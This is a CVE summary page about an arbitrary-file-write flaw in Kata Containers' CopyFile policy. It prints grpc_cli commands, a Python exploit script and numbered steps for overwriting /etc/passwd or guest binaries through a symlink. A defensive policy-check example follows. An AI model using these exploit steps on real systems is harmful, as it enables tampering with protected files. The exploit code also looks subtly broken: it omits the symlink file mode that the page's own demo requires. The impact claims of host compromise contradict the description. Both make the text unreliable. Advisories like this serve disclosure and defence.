How the CVE Works:
The vulnerability resides in the Kata Agent’s `CopyFile` API, specifically in how the `genpolicy`-generated policy enforces file copy operations. The policy only validates the destination `path` parameter, ensuring it resides within the shared directory (e.g., /run/kata-containers/shared/containers). Critically, the policy does not inspect any other fields in the `CopyFileRequest` message, such as the `data` field.

An attacker can exploit this by first issuing a `CopyFile` request that creates a symbolic link. In this request, the `path` is set to a location inside the allowed shared directory, but the `data` field contains the target path of an arbitrary file on the guest filesystem (e.g., a critical system binary). Since the policy only checks the path, this symlink creation request is permitted. The result is a symlink inside the shared directory that points to a sensitive file outside of it.

In a second step, the attacker crafts another, otherwise legitimate `CopyFile` request that writes malicious data to the symlink path (the path in the shared directory). Because the underlying filesystem follows the symlink, the write is transparently redirected to the symlink’s target, allowing the attacker to overwrite any file on the guest’s root filesystem that the kata-agent has permission to modify. This primitive enables complete subversion of container images, including those running in Confidential VMs (CVMs), allowing arbitrary code execution and data exfiltration.
dailycve form:
Platform: Kata Containers
Version: 3.4.0-3.28.0
Vulnerability: Arbitrary file write
Severity: High
Date: 2026-04-24
Prediction: Patch 2026-05-15
What Undercode Says:
```shell
# Simulate malicious symlink creation via CopyFile API
grpc_cli call localhost:50051 CopyFileService/CopyFile \
  'path: "/run/kata-containers/shared/containers/evil_link", data: "/etc/passwd"'

# Overwrite target via symlink using crafted payload
grpc_cli call localhost:50051 CopyFileService/CopyFile \
  'path: "/run/kata-containers/shared/containers/evil_link", data: "malicious_content"'
```
Python snippet to exploit the symlink-following behaviour:

```python
import grpc
import copyfile_pb2


def exploit():
    channel = grpc.insecure_channel('localhost:50051')
    stub = copyfile_pb2.CopyFileStub(channel)

    # Step 1: Create symlink inside shared dir pointing to /etc/passwd
    stub.CopyFile(copyfile_pb2.CopyFileRequest(
        path="/run/kata-containers/shared/containers/link_to_passwd",
        data="/etc/passwd"
    ))

    # Step 2: Overwrite /etc/passwd via symlink
    stub.CopyFile(copyfile_pb2.CopyFileRequest(
        path="/run/kata-containers/shared/containers/link_to_passwd",
        data="malicious_content"
    ))
```
Exploit:
- Discover target path in guest (e.g., /bin/bash).
- Create symlink from shared dir to target path.
- Write malicious data through symlink.
- Restart container to trigger payload.
Protection from this CVE:
- Upgrade Kata Containers to v3.29.0 or later.
- Implement custom policy validating symlink targets.
- Restrict `CopyFile` API access using seccomp.
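As an added illustration of the "custom policy validating symlink targets" advice above and of the path-only check described in "How the CVE Works" (example code written for this page, not code from Kata Containers or from the post), the following Python models both checks side by side: a policy that looks only at `path`, and a hardened one that also inspects `file_mode` and `data` for symlink requests and resolves the destination before a regular write. It assumes a request is a dict mirroring the agent's `CopyFileRequest` fields `path`, `file_mode` and `data`, and uses a temporary directory as a constructed stand-in for the guest filesystem.

```python
import os
import stat
import tempfile


def naive_policy(req, shared_root):
    """Model of the vulnerable rule: only the destination path is examined."""
    return os.path.normpath(req["path"]).startswith(shared_root.rstrip("/") + "/")


def _inside(candidate, root):
    """True if candidate, after resolving symlinks and '..', lies under root."""
    root = os.path.realpath(root)
    return os.path.commonpath([os.path.realpath(candidate), root]) == root


def hardened_policy(req, shared_root):
    """Inspect every field that decides where bytes land, not just `path`."""
    path = req["path"]
    if not _inside(os.path.dirname(path), shared_root):
        return False, "destination directory outside shared dir"
    if stat.S_ISLNK(req.get("file_mode", 0)):
        # Symlink request: `data` carries the link target. Resolve it relative
        # to the link's directory and require it to stay inside the shared dir.
        target = os.path.join(os.path.dirname(path), req["data"].decode())
        if not _inside(target, shared_root):
            return False, "symlink target escapes shared dir"
        return True, "ok"
    # Regular write: the fully resolved destination must also stay inside, so a
    # pre-existing symlink cannot redirect the write to a guest system file.
    if not _inside(path, shared_root):
        return False, "write would follow symlink out of shared dir"
    return True, "ok"


def demo():
    """Constructed scenario: a link in the shared dir pointing at a file outside it."""
    base = tempfile.mkdtemp()
    shared = os.path.join(base, "shared", "containers")
    os.makedirs(shared)
    outside = os.path.join(base, "passwd")  # stand-in for a guest system file
    open(outside, "w").close()
    link = os.path.join(shared, "evil_link")
    step1 = {"path": link, "file_mode": stat.S_IFLNK | 0o777, "data": outside.encode()}
    os.symlink(outside, link)  # what the agent would do once step 1 is allowed
    step2 = {"path": link, "file_mode": stat.S_IFREG | 0o644, "data": b"payload"}
    benign = {"path": os.path.join(shared, "ok.txt"), "file_mode": stat.S_IFREG, "data": b"x"}
    return {"naive_step1": naive_policy(step1, shared),
            "naive_step2": naive_policy(step2, shared),
            "hardened_step1": hardened_policy(step1, shared)[0],
            "hardened_step2": hardened_policy(step2, shared)[0],
            "hardened_benign": hardened_policy(benign, shared)[0]}
```

Running `demo()` shows the path-only policy admitting both steps of the chain while the hardened policy rejects each of them and still allows an ordinary write into the shared directory.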
Impact:
Complete host-side compromise of container images, leading to guest binary overwrite, container escape, and data theft from CVMs.
Sources:
Reported By: github.com
Extra Source Hub:
Undercode